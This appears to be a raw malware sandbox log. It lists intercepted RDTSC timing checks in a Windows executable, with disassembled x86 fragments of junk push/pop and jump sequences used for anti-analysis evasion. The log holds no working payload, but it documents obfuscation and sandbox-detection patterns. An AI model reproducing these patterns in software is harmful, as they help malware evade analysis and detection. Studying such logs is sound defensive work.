Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2A093C second address: 2A0942 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2A0942 second address: 2A0947 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2A0058 second address: 2A007F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0549119949h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jg 00007F0549119938h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2A007F second address: 2A0086 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2A0086 second address: 2A00A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F0549119944h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2A00A4 second address: 2A00F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05491602DBh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007F0549160306h 0x00000014 jmp 00007F05491602E7h 0x00000019 jmp 00007F05491602E9h 0x0000001e push esi 0x0000001f ja 00007F05491602D6h 0x00000025 pushad 0x00000026 popad 0x00000027 pop esi 0x00000028 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2A028F second address: 2A029E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007F0549119936h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2A029E second address: 2A02A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2A03DB second address: 2A03E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2A50FE second address: 2A512B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F05491602D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F05491602E5h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 pushad 0x00000015 push edi 0x00000016 push eax 0x00000017 pop eax 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2A512B second address: 2A512F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2A51FB second address: 2A5200 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2A5200 second address: 2A522C instructions: 0x00000000 rdtsc 0x00000002 je 00007F054911994Eh 0x00000008 jmp 00007F0549119948h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jg 00007F0549119936h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2A522C second address: 2A5237 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2A5237 second address: 2A5279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b jnp 00007F054911993Ch 0x00000011 pushad 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 jmp 00007F054911993Ah 0x00000019 popad 0x0000001a popad 0x0000001b mov eax, dword ptr [eax] 0x0000001d pushad 0x0000001e push edx 0x0000001f jmp 00007F0549119943h 0x00000024 pop edx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2A5279 second address: 2A527D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2AA58A second address: 2AA58F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2AA58F second address: 2AA5A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05491602DFh 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2AAB41 second address: 2AAB46 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2AAB46 second address: 2AAB4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2AAB4C second address: 2AAB5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F0549119936h 0x0000000d jns 00007F0549119936h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2AAF69 second address: 2AAF8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F05491602E6h 0x00000008 jbe 00007F05491602D6h 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2AB224 second address: 2AB229 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2AB229 second address: 2AB243 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F05491602D6h 0x00000009 jg 00007F05491602D6h 0x0000000f jne 00007F05491602D6h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2AB243 second address: 2AB27D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F054911993Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F054911993Bh 0x00000012 pushad 0x00000013 jmp 00007F0549119947h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2AB27D second address: 2AB282 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2AB282 second address: 2AB28A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2AB3F3 second address: 2AB3F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2AB3F7 second address: 2AB415 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007F054911993Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007F0549119936h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2AB415 second address: 2AB422 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F05491602D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2AB422 second address: 2AB428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2AB55B second address: 2AB55F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2AB55F second address: 2AB588 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jc 00007F0549119936h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d je 00007F0549119936h 0x00000013 jmp 00007F0549119944h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2AB588 second address: 2AB5A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push esi 0x00000007 jmp 00007F05491602E0h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 234DDA second address: 234DEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007F054911993Ah 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 234DEF second address: 234E10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F05491602E9h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 234E10 second address: 234E17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 234E17 second address: 234E28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F05491602D6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2B3713 second address: 2B3717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2B3853 second address: 2B3857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2B3857 second address: 2B3878 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0549119936h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c jns 00007F0549119938h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F054911993Bh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2B3878 second address: 2B387C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2B387C second address: 2B3890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F0549119936h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007F054911993Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2B3D67 second address: 2B3D78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F05491602DBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2B3466 second address: 2B346F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2B346F second address: 2B3473 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2BCC6A second address: 2BCC85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0549119947h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2BB6E0 second address: 2BB6E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2BB6E6 second address: 2BB6EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2BBB89 second address: 2BBBA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007F05491602DEh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2BBBA0 second address: 2BBBA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2BBBA4 second address: 2BBBC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F05491602E4h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2BBFAF second address: 2BBFBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007F0549119936h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2BBFBB second address: 2BBFC1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2BB40F second address: 2BB42F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0549119947h 0x00000009 popad 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2C1495 second address: 2C14A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jc 00007F05491602D6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2C14A4 second address: 2C14B0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0549119936h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2C14B0 second address: 2C14C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602DAh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2C14C2 second address: 2C14C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2C14C6 second address: 2C14CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27AFD3 second address: 27AFDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27AFDC second address: 27AFE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27B3D2 second address: 27B3DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F0549119936h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27B3DC second address: 27B3FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jns 00007F05491602D6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27B4AA second address: 27B4AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27B4AF second address: 27B539 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 751990B3h 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007F05491602D8h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 0000001Dh 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a mov dl, AAh 0x0000002c call 00007F05491602D9h 0x00000031 jmp 00007F05491602DAh 0x00000036 push eax 0x00000037 jg 00007F05491602E0h 0x0000003d mov eax, dword ptr [esp+04h] 0x00000041 jmp 00007F05491602DEh 0x00000046 mov eax, dword ptr [eax] 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b jnp 00007F05491602D6h 0x00000051 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27B91D second address: 27B924 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27BDD4 second address: 27BDE6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F05491602D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F05491602D6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27BF14 second address: 27BF42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edi 0x00000008 jnl 00007F0549119938h 0x0000000e pop edi 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007F054911993Bh 0x00000018 mov eax, dword ptr [eax] 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f js 00007F0549119936h 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27BF42 second address: 27BF5C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jne 00007F05491602D6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 je 00007F05491602D8h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2C0765 second address: 2C0788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F054911993Bh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0549119941h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2C0788 second address: 2C078D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2C0A62 second address: 2C0A8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007F0549119936h 0x0000000d jmp 00007F054911993Fh 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 popad 0x00000015 pushad 0x00000016 js 00007F0549119936h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2C0E7E second address: 2C0E82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2C0E82 second address: 2C0E96 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0549119936h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007F0549119936h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2C0E96 second address: 2C0E9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2C0FE7 second address: 2C1003 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0549119946h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2C1003 second address: 2C1046 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F05491602D8h 0x00000008 jmp 00007F05491602DDh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 jns 00007F05491602D6h 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b popad 0x0000001c push eax 0x0000001d jmp 00007F05491602E7h 0x00000022 pop eax 0x00000023 push eax 0x00000024 push edx 0x00000025 push ecx 0x00000026 pop ecx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2C4DC2 second address: 2C4DC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2C4944 second address: 2C495E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F05491602DDh 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2C495E second address: 2C4962 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2CC33B second address: 2CC33F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2CC33F second address: 2CC34B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2CC34B second address: 2CC34F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27BAA2 second address: 27BAA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27BAA8 second address: 27BAFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 nop 0x00000007 sub ecx, dword ptr [ebp+122D2913h] 0x0000000d mov ebx, dword ptr [ebp+12486BD8h] 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007F05491602D8h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d clc 0x0000002e add eax, ebx 0x00000030 mov edi, dword ptr [ebp+122D3873h] 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a jmp 00007F05491602E3h 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27BAFD second address: 27BB02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27BB02 second address: 27BB07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
